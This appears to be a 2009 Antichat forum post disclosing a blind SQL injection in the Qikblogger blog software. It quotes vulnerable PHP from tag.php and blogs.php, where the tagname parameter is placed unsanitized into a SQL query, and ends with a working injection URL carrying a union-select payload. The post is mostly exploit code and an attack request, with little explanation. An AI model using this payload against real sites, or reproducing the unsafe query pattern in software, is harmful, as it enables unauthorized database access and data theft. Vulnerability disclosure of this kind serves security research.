22.12.2009, 13:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами:
9285506
Репутация:
1463
|
|
Qikblogger (qb-krypton-0.9beta-patched)
http://qikblogger.sourceforge.net
Blind SQL
mq=off
tag.php
PHP код:
if ( isset($_GET['blog_name']) && isset($_GET['tagname']) ) {
$blog_name = trim($_GET['blog_name']);
$tagname = trim($_GET['tagname']);
,,,
$post_ids = $b->get_tag_posts($tagname);
blogs.php
PHP код:
function get_tag_posts($tagname)
if ( $db->query("SELECT tags.post_id as ids FROM tags, posts WHERE tags.tagname='$tagname' AND tags.blog_name='$this->blog_name' AND tags.post_id=posts.post_id AND posts.disp_dt < CURRENT_TIMESTAMP() ORDER BY posts.disp_dt DESC ;") ) {
http://localhost/qb/tag.php?blog_name=barbie&tagname=barbie'+union+sel ect+1+--+1
|
|
|